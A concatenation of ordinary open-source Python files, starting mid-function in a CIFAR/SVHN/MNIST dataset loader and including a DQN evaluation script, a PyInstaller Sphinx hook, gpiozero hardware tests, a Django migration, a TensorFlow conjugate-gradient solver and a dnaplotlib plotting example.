Returns Xtr, Ytr, Xte, Yte as numpy arrays
'''
assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None))
if root_path is None:
print 'Downloading CIFAR10 dataset...'
tar_path = os.path.join(save_dir, "cifar-10-python.tar.gz")
url = urllib.URLopener()
url.retrieve("https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz", tar_path)
print 'Download Done, Extracting...'
tar = tarfile.open(tar_path)
tar.extractall(save_dir)
tar.close()
root = os.path.join(save_dir, "cifar-10-batches-py") if not root_path else root_path
# Training Data
xs = []
ys = []
for b in range(1,6):
f = os.path.join(root, 'data_batch_%d' % (b, ))
X, Y = load_CIFAR_batch(f)
xs.append(X)
ys.append(Y)
Xtr = np.concatenate(xs)
Ytr = np.concatenate(ys)
print 'Xtrain shape', Xtr.shape
print 'Ytrain shape', Ytr.shape
# Testing data
Xte, Yte = load_CIFAR_batch(os.path.join(root, 'test_batch'))
print 'Xtest shape', Xte.shape
print 'Ytest shape', Yte.shape
return Xtr, Ytr, Xte, Yte
def get_svhn(save_dir=None, root_path=None):
''' If root_path is None, we download the data set from internet.
Either save path or root path must not be None and not both.
Returns Xtr, Ytr, Xte, Yte as numpy arrays
'''
assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None))
if root_path is None:
new_save_dir = os.path.join(save_dir, 'og_data')
if not os.path.isdir(new_save_dir):
os.mkdir(new_save_dir)
train_mat = os.path.join(new_save_dir, "train_32x32.mat")
test_mat = os.path.join(new_save_dir, "test_32x32.mat")
url = urllib.URLopener()
print 'Downloading Svhn Train...'
url.retrieve("http://ufldl.stanford.edu/housenumbers/train_32x32.mat", train_mat)
print 'Downloading Svhn Test...'
url.retrieve("http://ufldl.stanford.edu/housenumbers/test_32x32.mat", test_mat)
root = new_save_dir if not root_path else root_path
train = io.loadmat(os.path.join(root, 'train_32x32.mat'))
Xtr = train['X']
Ytr = train['y']
del train
test = io.loadmat(os.path.join(root, 'test_32x32.mat'))
Xte = test['X']
Yte = test['y']
del test
Xtr = np.transpose(Xtr, (3, 2, 0, 1))
Xte = np.transpose(Xte, (3, 2, 0, 1))
Ytr = Ytr.reshape(Ytr.shape[:1]) - 1
Yte = Yte.reshape(Yte.shape[:1]) - 1
print 'Xtrain shape', Xtr.shape
print 'Ytrain shape', Ytr.shape
print 'Xtest shape', Xte.shape
print 'Ytest shape', Yte.shape
return Xtr, Ytr, Xte, Yte
def get_svhn_small(save_dir=None, root_path=None):
assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None))
Xtr, Ytr, Xte, Yte = get_svhn(save_dir, root_path)
val_x = []
val_y = []
train_x = []
train_y = []
for i in np.unique(Ytr):
# Get 400 images from X_small
X_small_label = Xtr[Ytr == i]
train_x.append(X_small_label[:700])
train_y.append([i]*700)
val_x.append(X_small_label[700:1000])
val_y.append([i]*300)
Xtr = np.concatenate(train_x)
Ytr = np.concatenate(train_y)
Xval = np.concatenate(val_x)
Yval = np.concatenate(val_y)
print 'Xtrain shape', Xtr.shape
print 'Ytrain shape', Ytr.shape
print 'Xval shape', Xval.shape
print 'Yval shape', Yval.shape
print 'Xtest shape', Xte.shape
print 'Ytest shape', Yte.shape
return Xtr, Ytr, Xval, Yval, Xte, Yte
def get_svhn_full(save_dir=None, root_path=None):
''' If root_path is None, we download the data set from internet.
Either save path or root path must not be None and not both.
Returns Xtr, Ytr, Xte, Yte as numpy arrays
'''
assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None))
Xtr_small, Ytr_small, Xte, Yte = get_svhn(save_dir, root_path)
if root_path is None:
new_save_dir = os.path.join(save_dir, 'og_data')
if not os.path.isdir(new_save_dir):
os.mkdir(new_save_dir)
extra_mat = os.path.join(new_save_dir, "extra_32x32.mat")
url = urllib.URLopener()
print 'Downloading Svhn Extra...'
url.retrieve("http://ufldl.stanford.edu/housenumbers/extra_32x32.mat", extra_mat)
root = new_save_dir if not root_path else root_path
extra = io.loadmat(os.path.join(root, 'extra_32x32.mat'))
Xtr_extra = extra['X']
Ytr_extra = extra['y']
Xtr_extra = np.transpose(Xtr_extra, (3, 2, 0, 1))
Ytr_extra = Ytr_extra.reshape(Ytr_extra.shape[:1]) - 1
print 'Xextra shape', Xtr_extra.shape
print 'Yextra shape', Ytr_extra.shape
val_x = []
val_y = []
train_x = []
train_y = []
for i in np.unique(Ytr_small):
# Get 400 images from X_small
X_small_label = Xtr_small[Ytr_small == i]
val_x.append(X_small_label[:400])
val_y.append([i]*400)
train_x.append(X_small_label[400:])
train_y.append([i]*(X_small_label.shape[0] - 400))
# Get 200 images from X_small
X_extra_label = Xtr_extra[Ytr_extra == i]
val_x.append(X_extra_label[:200])
val_y.append([i]*200)
train_x.append(X_extra_label[200:])
train_y.append([i]*(X_extra_label.shape[0] - 200))
Xtr = np.concatenate(train_x)
Ytr = np.concatenate(train_y)
Xval = np.concatenate(val_x)
Yval = np.concatenate(val_y)
return Xtr, Ytr, Xval, Yval, Xte, Yte
def load_cifar100_data(filename):
with open(filename, 'rb') as f:
datadict = pickle.load(f)
data = datadict['data']
labels = datadict['fine_labels']
N = len(labels)
data = data.reshape((N, 3, 32, 32))
labels = np.array(labels)
return data,labels
def get_cifar100(save_dir=None, root_path=None):
''' If root_path is None, we download the data set from internet.
Either save path or root path must not be None and not both.
Returns Xtr, Ytr, Xte, Yte as numpy arrays
'''
assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None))
if root_path is None:
print 'Downloading CIFAR100 dataset...'
tar_path = os.path.join(save_dir, "cifar-100-python.tar.gz")
url = urllib.URLopener()
url.retrieve("https://www.cs.toronto.edu/~kriz/cifar-100-python.tar.gz", tar_path)
print 'Download Done, Extracting...'
tar = tarfile.open(tar_path)
tar.extractall(save_dir)
tar.close()
root = os.path.join(save_dir, "cifar-100-python") if not root_path else root_path
Xtr, Ytr = load_cifar100_data(os.path.join(root, 'train'))
Xte, Yte = load_cifar100_data(os.path.join(root, 'test'))
print 'Xtrain shape', Xtr.shape
print 'Ytrain shape', Ytr.shape
print 'Xtest shape', Xte.shape
print 'Ytest shape', Yte.shape
return Xtr, Ytr, Xte, Yte
def get_byte(file_in):
int_out = ord(file_in.read(1))
return int_out
def get_int(file_in):
int_out = struct.unpack('>i', file_in.read(4))[0]
return int_out
def get_image(file_in, row=28, col=28):
raw_data = file_in.read(row*col)
out_image = np.frombuffer(raw_data, np.uint8)
out_image = out_image.reshape((28,28))
return out_image
def load_mnist(image_fname, label_fname):
with open(image_fname, "rb") as image_file, open(label_fname, "rb") as label_file:
assert(get_int(image_file) == 2051)
assert(get_int(label_file) == 2049)
n_items_label =get_int(label_file)
n_items = get_int(image_file)
assert(n_items_label == n_items)
assert(get_int(image_file) == 28)
assert(get_int(image_file) == 28)
Y = []
X = np.zeros((n_items, 1, 28, 28), dtype=np.uint8)
print "Reading [%d] items" % n_items
for i in range(n_items):
label = get_byte(label_file)
assert(label <= 9)
assert(label >= 0)
Y.append(label)
X[i,:] = get_image(image_file)
return X, np.asarray(Y)
def get_mnist(save_dir=None, root_path=None):
''' If root_path is None, we download the data set from internet.
Either save path or root path must not be None and not both.
Returns Xtr, Ytr, Xte, Yte as numpy arrays
'''
assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None))
mnist_files = ['train-images-idx3-ubyte', 'train-labels-idx1-ubyte',
't10k-images-idx3-ubyte','t10k-labels-idx1-ubyte']
out_mnist_files = []
if root_path is None:
print 'Downloading MNIST dataset...'
for fname in mnist_files:
out_file = os.path.join(save_dir, "%s" % fname)
tar_path = os.path.join(save_dir, "%s.gz" % fname)
out_mnist_files.append(out_file)
url = urllib.URLopener()
url.retrieve("http://yann.lecun.com/exdb/mnist/%s.gz" % fname, tar_path)
print 'Download Done, Extracting... [%s]' % tar_path
os.system('gunzip -f %s' % tar_path)
Xtr, Ytr = load_mnist(out_mnist_files[0], out_mnist_files[1])
print 'Xtrain shape', Xtr.shape
print 'Ytrain shape', Ytr.shape
# Testing data
Xte, Yte = load_mnist(out_mnist_files[2], out_mnist_files[3])
print 'Xtest shape', Xte.shape
print 'Ytest shape', Yte.shape
return Xtr, Ytr, Xte, Yte |
Chapter03/eval.py | jvstinian/Python-Reinforcement-Learning-Projects | 114 | 12635263 | <reponame>jvstinian/Python-Reinforcement-Learning-Projects<gh_stars>100-1000
'''
Created on Mar 28, 2018
@author: ywz
'''
import os
import argparse
import tensorflow as tf
from q_learning import DQN
from config import ATARI, DEMO
from environment import new_atari_game, new_demo
def main():
parser = argparse.ArgumentParser(description=None)
parser.add_argument('-g', '--game', default='demo', type=str, help='Game')
parser.add_argument('-d', '--device', default='cpu', type=str, help='Device')
args = parser.parse_args()
rom = args.game
if rom == 'demo':
game = new_demo()
conf = DEMO
else:
game = new_atari_game(rom)
conf = ATARI
model_dir = os.path.join(conf['log_dir'], rom)
device = '/{}:0'.format(args.device)
with tf.device(device):
dqn = DQN(conf, game, model_dir, callback=game.draw)
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
saver = tf.train.Saver()
dqn.load(sess, saver)
dqn.evaluate(sess)
if __name__ == "__main__":
main()
|
PyInstaller/hooks/hook-sphinx.py | hawkhai/pyinstaller | 9,267 | 12635301 | <filename>PyInstaller/hooks/hook-sphinx.py
#-----------------------------------------------------------------------------
# Copyright (c) 2013-2021, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
from PyInstaller.utils.hooks import collect_data_files, collect_submodules, eval_statement
# Sphinx consists of several extensions that are lazily loaded. So collect all submodules to ensure we do not miss
# any of them.
hiddenimports = collect_submodules('sphinx')
# For each extension in sphinx.application.builtin_extensions that does not come from the sphinx package, do a
# collect_submodules(). We need to do this explicitly because collect_submodules() does not seem to work with
# namespace packages, which precludes us from simply doing hiddenimports += collect_submodules('sphinxcontrib')
builtin_extensions = list(
eval_statement(
"""
from sphinx.application import builtin_extensions
print(builtin_extensions)
"""
)
)
for extension in builtin_extensions:
if extension.startswith('sphinx.'):
continue # Already collected
hiddenimports += collect_submodules(extension)
# This is inherited from an earlier version of the hook, and seems to have been required in Sphinx v.1.3.1 era due to
# https://github.com/sphinx-doc/sphinx/blob/b87ce32e7dc09773f9e71305e66e8d6aead53dd1/sphinx/cmdline.py#L173.
# It does not hurt to keep it around, just in case.
hiddenimports += ['locale']
# Collect all data files: *.html and *.conf files in ``sphinx.themes``, translation files in ``sphinx.locale``, etc.
# Also collect all data files for the alabaster theme.
datas = collect_data_files('sphinx') + collect_data_files('alabaster')
|
tests/test_real_pins.py | codecademy-engineering/gpiozero | 743 | 12635302 | <gh_stars>100-1000
# vim: set fileencoding=utf-8:
#
# GPIO Zero: a library for controlling the Raspberry Pi's GPIO pins
#
# Copyright (c) 2016-2021 <NAME> <<EMAIL>>
# Copyright (c) 2020 <NAME> <<EMAIL>>
#
# SPDX-License-Identifier: BSD-3-Clause
import os
import errno
from time import time, sleep
from math import isclose
from unittest import mock
import pytest
import pkg_resources
from gpiozero import *
from gpiozero.pins.mock import MockConnectedPin, MockFactory, MockSPIDevice
from gpiozero.pins.native import NativeFactory
from gpiozero.pins.local import LocalPiFactory
# This module assumes you've wired the following GPIO pins together. The pins
# can be re-configured via the listed environment variables (useful for when
# your testing rig requires different pins because the defaults interfere with
# attached hardware).
TEST_PIN = int(os.environ.get('GPIOZERO_TEST_PIN', '22'))
INPUT_PIN = int(os.environ.get('GPIOZERO_TEST_INPUT_PIN', '27'))
TEST_LOCK = os.environ.get('GPIOZERO_TEST_LOCK', '/tmp/real_pins_lock')
local_only = pytest.mark.skipif(
not isinstance(Device.pin_factory, LocalPiFactory),
reason="Test cannot run with non-local pin factories")
@pytest.fixture(
scope='module',
params=[
name
for name in pkg_resources.\
get_distribution('gpiozero').\
get_entry_map('gpiozero_pin_factories').keys()
])
def pin_factory_name(request):
return request.param
@pytest.fixture()
def pin_factory(request, pin_factory_name):
try:
factory = pkg_resources.load_entry_point(
'gpiozero', 'gpiozero_pin_factories', pin_factory_name)()
except Exception as e:
pytest.skip("skipped factory {pin_factory_name}: {e!s}".format(
pin_factory_name=pin_factory_name, e=e))
else:
yield factory
factory.close()
@pytest.fixture()
def default_factory(request, pin_factory):
save_pin_factory = Device.pin_factory
Device.pin_factory = pin_factory
yield pin_factory
Device.pin_factory = save_pin_factory
@pytest.fixture(scope='function')
def pins(request, pin_factory):
# Why return both pins in a single fixture? If we defined one fixture for
# each pin then pytest will (correctly) test RPiGPIOPin(22) against
# NativePin(27) and so on. This isn't supported, so we don't test it
assert not (
{INPUT_PIN, TEST_PIN} & {2, 3, 7, 8, 9, 10, 11}), \
'Cannot use SPI (7-11) or I2C (2-3) pins for tests'
input_pin = pin_factory.pin(INPUT_PIN)
input_pin.function = 'input'
input_pin.pull = 'down'
if isinstance(pin_factory, MockFactory):
test_pin = pin_factory.pin(TEST_PIN, pin_class=MockConnectedPin, input_pin=input_pin)
else:
test_pin = pin_factory.pin(TEST_PIN)
yield test_pin, input_pin
test_pin.close()
input_pin.close()
def setup_module(module):
start = time()
while True:
if time() - start > 300: # 5 minute timeout
raise RuntimeError('timed out waiting for real pins lock')
try:
with open(TEST_LOCK, 'x') as f:
f.write('Lock file for gpiozero real-pin tests; delete '
'this if the test suite is not currently running\n')
except FileExistsError:
print('Waiting for lock before testing real-pins')
sleep(0.1)
else:
break
def teardown_module(module):
os.unlink(TEST_LOCK)
def test_pin_numbers(pins):
test_pin, input_pin = pins
assert test_pin.number == TEST_PIN
assert input_pin.number == INPUT_PIN
def test_function_bad(pins):
test_pin, input_pin = pins
with pytest.raises(PinInvalidFunction):
test_pin.function = 'foo'
def test_output(pins):
test_pin, input_pin = pins
test_pin.function = 'output'
test_pin.state = 0
assert input_pin.state == 0
test_pin.state = 1
assert input_pin.state == 1
def test_output_with_state(pins):
test_pin, input_pin = pins
test_pin.output_with_state(0)
assert input_pin.state == 0
test_pin.output_with_state(1)
assert input_pin.state == 1
def test_pull(pins):
test_pin, input_pin = pins
input_pin.pull = 'floating'
test_pin.function = 'input'
test_pin.pull = 'up'
assert test_pin.state == 1
assert input_pin.state == 1
test_pin.pull = 'down'
assert test_pin.state == 0
assert input_pin.state == 0
def test_pull_bad(pins):
test_pin, input_pin = pins
test_pin.function = 'input'
with pytest.raises(PinInvalidPull):
test_pin.pull = 'foo'
with pytest.raises(PinInvalidPull):
test_pin.input_with_pull('foo')
def test_pull_down_warning(pin_factory):
if pin_factory.pi_info.pulled_up('GPIO2'):
pin = pin_factory.pin(2)
try:
with pytest.raises(PinFixedPull):
pin.pull = 'down'
with pytest.raises(PinFixedPull):
pin.input_with_pull('down')
finally:
pin.close()
else:
pytest.skip("GPIO2 isn't pulled up on this pi")
def test_input_with_pull(pins):
test_pin, input_pin = pins
input_pin.pull = 'floating'
test_pin.input_with_pull('up')
assert test_pin.state == 1
assert input_pin.state == 1
test_pin.input_with_pull('down')
assert test_pin.state == 0
assert input_pin.state == 0
def test_pulls_are_weak(pins):
test_pin, input_pin = pins
test_pin.function = 'output'
for pull in ('floating', 'down', 'up'):
input_pin.pull = pull
test_pin.state = 0
assert input_pin.state == 0
test_pin.state = 1
assert input_pin.state == 1
def test_bad_duty_cycle(pins):
test_pin, input_pin = pins
test_pin.function = 'output'
try:
# NOTE: There's some race in RPi.GPIO that causes a segfault if we
# don't pause before starting PWM; only seems to happen when stopping
# and restarting PWM very rapidly (i.e. between test cases).
if Device.pin_factory.__class__.__name__ == 'RPiGPIOFactory':
sleep(0.1)
test_pin.frequency = 100
except PinPWMUnsupported:
pytest.skip("{test_pin.factory!r} doesn't support PWM".format(
test_pin=test_pin))
else:
try:
with pytest.raises(ValueError):
test_pin.state = 1.1
finally:
test_pin.frequency = None
def test_duty_cycles(pins):
test_pin, input_pin = pins
test_pin.function = 'output'
try:
# NOTE: see above
if Device.pin_factory.__class__.__name__ == 'RPiGPIOFactory':
sleep(0.1)
test_pin.frequency = 100
except PinPWMUnsupported:
pytest.skip("{test_pin.factory!r} doesn't support PWM".format(
test_pin=test_pin))
else:
try:
for duty_cycle in (0.0, 0.1, 0.5, 1.0):
test_pin.state = duty_cycle
assert test_pin.state == duty_cycle
total = sum(input_pin.state for i in range(20000))
assert isclose(total / 20000, duty_cycle, rel_tol=0.1, abs_tol=0.1)
finally:
test_pin.frequency = None
def test_explicit_factory(no_default_factory, pin_factory):
with GPIODevice(TEST_PIN, pin_factory=pin_factory) as device:
assert Device.pin_factory is None
assert device.pin_factory is pin_factory
assert device.pin.number == TEST_PIN
def test_envvar_factory(no_default_factory, pin_factory_name):
os.environ['GPIOZERO_PIN_FACTORY'] = pin_factory_name
assert Device.pin_factory is None
try:
device = GPIODevice(TEST_PIN)
except Exception as e:
pytest.skip("skipped factory {pin_factory_name}: {e!s}".format(
pin_factory_name=pin_factory_name, e=e))
else:
try:
group = 'gpiozero_pin_factories'
for factory in pkg_resources.iter_entry_points(group, pin_factory_name):
factory_class = factory.load()
assert isinstance(Device.pin_factory, factory_class)
assert device.pin_factory is Device.pin_factory
assert device.pin.number == TEST_PIN
finally:
device.close()
Device.pin_factory.close()
def test_compatibility_names(no_default_factory):
os.environ['GPIOZERO_PIN_FACTORY'] = 'NATIVE'
try:
device = GPIODevice(TEST_PIN)
except Exception as e:
pytest.skip("skipped factory {pin_factory_name}: {e!s}".format(
pin_factory_name=pin_factory_name, e=e))
else:
try:
assert isinstance(Device.pin_factory, NativeFactory)
assert device.pin_factory is Device.pin_factory
assert device.pin.number == TEST_PIN
finally:
device.close()
Device.pin_factory.close()
def test_bad_factory(no_default_factory):
os.environ['GPIOZERO_PIN_FACTORY'] = 'foobarbaz'
# Waits for someone to implement the foobarbaz pin factory just to
# mess with our tests ...
with pytest.raises(BadPinFactory):
GPIODevice(TEST_PIN)
def test_default_factory(no_default_factory):
assert Device.pin_factory is None
os.environ.pop('GPIOZERO_PIN_FACTORY', None)
try:
device = GPIODevice(TEST_PIN)
except Exception as e:
pytest.skip("no default factories")
else:
try:
assert device.pin_factory is Device.pin_factory
assert device.pin.number == TEST_PIN
finally:
device.close()
Device.pin_factory.close()
def test_spi_init(pin_factory):
with pin_factory.spi() as intf:
assert isinstance(intf, SPI)
assert repr(intf) == 'SPI(clock_pin=11, mosi_pin=10, miso_pin=9, select_pin=8)'
intf.close()
assert intf.closed
assert repr(intf) == 'SPI(closed)'
with pin_factory.spi(port=0, device=1) as intf:
assert repr(intf) == 'SPI(clock_pin=11, mosi_pin=10, miso_pin=9, select_pin=7)'
with pin_factory.spi(clock_pin=11, mosi_pin=10, select_pin=8) as intf:
assert repr(intf) == 'SPI(clock_pin=11, mosi_pin=10, miso_pin=9, select_pin=8)'
# Ensure we support "partial" SPI where we don't reserve a pin because
# the device wants it for general IO (see SPI screens which use a pin
# for data/commands)
with pin_factory.spi(clock_pin=11, mosi_pin=10, miso_pin=None, select_pin=7) as intf:
assert isinstance(intf, SPI)
with pin_factory.spi(clock_pin=11, mosi_pin=None, miso_pin=9, select_pin=7) as intf:
assert isinstance(intf, SPI)
with pin_factory.spi(shared=True) as intf:
assert isinstance(intf, SPI)
with pytest.raises(ValueError):
pin_factory.spi(port=1)
with pytest.raises(ValueError):
pin_factory.spi(device=2)
with pytest.raises(ValueError):
pin_factory.spi(port=0, clock_pin=12)
with pytest.raises(ValueError):
pin_factory.spi(foo='bar')
def test_spi_hardware_conflict(default_factory):
with LED(11) as led:
with pytest.raises(GPIOPinInUse):
Device.pin_factory.spi(port=0, device=0)
with Device.pin_factory.spi(port=0, device=0) as spi:
with pytest.raises(GPIOPinInUse):
LED(11)
def test_spi_hardware_same_bus(default_factory):
with Device.pin_factory.spi(device=0) as intf:
with pytest.raises(GPIOPinInUse):
Device.pin_factory.spi(device=0)
with Device.pin_factory.spi(device=1) as another_intf:
assert intf._bus is another_intf._bus
def test_spi_hardware_shared_bus(default_factory):
with Device.pin_factory.spi(device=0, shared=True) as intf:
with Device.pin_factory.spi(device=0, shared=True) as another_intf:
assert intf is another_intf
@local_only
def test_spi_hardware_read(default_factory):
with mock.patch('gpiozero.pins.local.SpiDev') as spidev:
spidev.return_value.xfer2.side_effect = lambda data: list(range(10))[:len(data)]
with Device.pin_factory.spi() as intf:
assert intf.read(3) == [0, 1, 2]
assert intf.read(6) == list(range(6))
@local_only
def test_spi_hardware_write(default_factory):
with mock.patch('gpiozero.pins.local.SpiDev') as spidev:
spidev.return_value.xfer2.side_effect = lambda data: list(range(10))[:len(data)]
with Device.pin_factory.spi() as intf:
assert intf.write([0, 1, 2]) == 3
assert spidev.return_value.xfer2.called_with([0, 1, 2])
assert intf.write(list(range(6))) == 6
assert spidev.return_value.xfer2.called_with(list(range(6)))
@local_only
def test_spi_hardware_modes(default_factory):
with mock.patch('gpiozero.pins.local.SpiDev') as spidev:
spidev.return_value.mode = 0
spidev.return_value.lsbfirst = False
spidev.return_value.cshigh = True
spidev.return_value.bits_per_word = 8
with Device.pin_factory.spi() as intf:
assert intf.clock_mode == 0
assert not intf.clock_polarity
assert not intf.clock_phase
intf.clock_polarity = False
assert intf.clock_mode == 0
intf.clock_polarity = True
assert intf.clock_mode == 2
intf.clock_phase = True
assert intf.clock_mode == 3
assert not intf.lsb_first
assert intf.select_high
assert intf.bits_per_word == 8
intf.select_high = False
intf.lsb_first = True
intf.bits_per_word = 12
assert not spidev.return_value.cshigh
assert spidev.return_value.lsbfirst
assert spidev.return_value.bits_per_word == 12
intf.rate = 1000000
assert intf.rate == 1000000
intf.rate = 500000
assert intf.rate == 500000
# XXX Test two simultaneous SPI devices sharing clock, MOSI, and MISO, with
# separate select pins (including threaded tests which attempt simultaneous
# reading/writing)
|
src/olympia/addons/migrations/0021_auto_20200909_1302.py | osamamagdy/addons-server | 843 | 12635304 | # Generated by Django 2.2.16 on 2020-09-09 13:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("addons", "0020_auto_20200805_1350"),
]
operations = [
migrations.AlterField(
model_name="addon",
name="total_downloads",
field=models.PositiveIntegerField(
db_column="totaldownloads", default=0, null=True
),
),
]
|
tensorflow/contrib/solvers/python/ops/linear_equations.py | AlexChrisF/udacity | 522 | 12635305 | <reponame>AlexChrisF/udacity
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Solvers for linear equations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from tensorflow.contrib.solvers.python.ops import util
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
def conjugate_gradient(operator,
rhs,
tol=1e-4,
max_iter=20,
name="conjugate_gradient"):
r"""Conjugate gradient solver.
Solves a linear system of equations `A*x = rhs` for selfadjoint, positive
definite matrix `A` and righ-hand side vector `rhs`, using an iterative,
matrix-free algorithm where the action of the matrix A is represented by
`operator`. The iteration terminates when either the number of iterations
exceeds `max_iter` or when the residual norm has been reduced to `tol`
times its initial value, i.e. \\(||rhs - A x_k|| <= tol ||rhs||\\).
Args:
operator: An object representing a linear operator with attributes:
- shape: Either a list of integers or a 1-D `Tensor` of type `int32` of
length 2. `shape[0]` is the dimension on the domain of the operator,
`shape[1]` is the dimension of the co-domain of the operator. On other
words, if operator represents an N x N matrix A, `shape` must contain
`[N, N]`.
- dtype: The datatype of input to and output from `apply`.
- apply: Callable object taking a vector `x` as input and returning a
vector with the result of applying the operator to `x`, i.e. if
`operator` represents matrix `A`, `apply` should return `A * x`.
rhs: A rank-1 `Tensor` of shape `[N]` containing the right-hand size vector.
tol: A float scalar convergence tolerance.
max_iter: An integer giving the maximum number of iterations.
name: A name scope for the operation.
Returns:
output: A namedtuple representing the final state with fields:
- i: A scalar `int32` `Tensor`. Number of iterations executed.
- x: A rank-1 `Tensor` of shape `[N]` containing the computed solution.
- r: A rank-1 `Tensor` of shape `[M]` containing the residual vector.
- p: A rank-1 `Tensor` of shape `[N]`. `A`-conjugate basis vector.
- gamma: \\(||r||_2^2\\)
"""
# ephemeral class holding CG state.
cg_state = collections.namedtuple("CGState", ["i", "x", "r", "p", "gamma"])
def stopping_criterion(i, state):
return math_ops.logical_and(i < max_iter, state.gamma > tol)
# TODO(rmlarsen): add preconditioning
def cg_step(i, state):
z = operator.apply(state.p)
alpha = state.gamma / util.dot(state.p, z)
x = state.x + alpha * state.p
r = state.r - alpha * z
gamma = util.l2norm_squared(r)
beta = gamma / state.gamma
p = r + beta * state.p
return i + 1, cg_state(i + 1, x, r, p, gamma)
with ops.name_scope(name):
n = operator.shape[1:]
rhs = array_ops.expand_dims(rhs, -1)
gamma0 = util.l2norm_squared(rhs)
tol = tol * tol * gamma0
x = array_ops.expand_dims(
array_ops.zeros(
n, dtype=rhs.dtype.base_dtype), -1)
i = constant_op.constant(0, dtype=dtypes.int32)
state = cg_state(i=i, x=x, r=rhs, p=rhs, gamma=gamma0)
_, state = control_flow_ops.while_loop(stopping_criterion, cg_step,
[i, state])
return cg_state(
state.i,
x=array_ops.squeeze(state.x),
r=array_ops.squeeze(state.r),
p=array_ops.squeeze(state.p),
gamma=state.gamma)
|
gallery/scatter_annotate/scatter_annotate.py | zachfox/dnaplotlib | 267 | 12635375 | #!/usr/bin/env python
"""
Annotation of standard scatter plot with genetic constructs
"""
import numpy as np
import matplotlib.pyplot as plt
import dnaplotlib as dpl
import csv
__author__ = '<NAME> <<EMAIL>>, Voigt Lab, MIT'
__license__ = 'MIT'
__version__ = '1.0'
# Read some data points for the scatter plot
filename_in ='data_points.txt'
data_reader = csv.reader(open(filename_in, 'rU'), delimiter=' ')
x = []
y = []
for row in data_reader:
y.append( float(row[1]) )
x.append( float(row[2]) )
# Generate the scatter plot
fig = plt.figure(figsize=(2.8,2.32))
ax = plt.subplot(1, 1, 1)
ax.set_yscale('log')
ax.set_xlim([0.85,1.05])
ax.set_ylim([1,500])
ax.set_xticks([0.85, 0.9, 0.95, 1.0, 1.05])
ax.tick_params(axis='y', labelsize=8)
ax.tick_params(axis='x', labelsize=8)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.yaxis.set_ticks_position('left')
ax.xaxis.set_ticks_position('bottom')
plt.xlabel('Parameter 1', fontsize=8, labelpad=0)
plt.ylabel('Parameter 2', fontsize=8, labelpad=0)
ax.tick_params(axis='y', which='major', pad=1)
plt.scatter(x, y, c='none', s=6, edgecolor=(0.5,0.5,0.5), lw = 0.8) #(0.38, 0.65, 0.87)
# Add arrows to the constructs
plt.annotate(
'',
xy = (0.8785, 323.5), xytext = (25, 5),
textcoords = 'offset points', ha = 'right', va = 'bottom',
bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.5),
arrowprops = dict(arrowstyle = '->', linewidth=1.0, connectionstyle = 'arc3,rad=0'))
plt.annotate(
'',
xy = (0.977, 34), xytext = (20, 14),
textcoords = 'offset points', ha = 'right', va = 'bottom',
bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.5),
arrowprops = dict(arrowstyle = '->', linewidth=1.0, connectionstyle = 'arc3,rad=0'))
plt.annotate(
'',
xy = (0.982, 3.3), xytext = (22, 10),
textcoords = 'offset points', ha = 'right', va = 'bottom',
bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.5),
arrowprops = dict(arrowstyle = '->', linewidth=1.0, connectionstyle = 'arc3,rad=0'))
# Color maps (let's make sure we use similar colors)
col_map = {}
col_map['black'] = (0.00, 0.00, 0.00)
col_map['white'] = (1.00, 1.00, 1.00)
col_map['red'] = (0.95, 0.30, 0.25)
col_map['green'] = (0.38, 0.82, 0.32)
col_map['blue'] = (0.38, 0.65, 0.87)
col_map['orange'] = (1.00, 0.75, 0.17)
col_map['purple'] = (0.55, 0.35, 0.64)
col_map['yellow'] = (0.98, 0.97, 0.35)
# Global line width
lw = 1.0
# Define design 1
p1_1 = {'type':'Promoter', 'name':'pA', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black']}}
rbs_1_1 = {'type':'RBS', 'name':'rbs_f', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-6, 'x_extent':6}}
gA_1 = {'type':'CDS', 'name':'gA', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['red'], 'edgecolor':col_map['red'], 'x_extent':24, 'label':'A', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':-3, 'label_y_offset':-1}}
rbs_1_2 = {'type':'RBS', 'name':'rbs_r', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':2, 'x_extent':6}}
gB_1 = {'type':'CDS', 'name':'gB', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['blue'], 'edgecolor':col_map['blue'], 'x_extent':24, 'label':'B', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':-3, 'label_y_offset':-1}}
t1_1 = {'type':'Terminator', 'name':'t0', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-1}}
design1 = [p1_1, rbs_1_1, gA_1, rbs_1_2, gB_1, t1_1]
# Define design 2
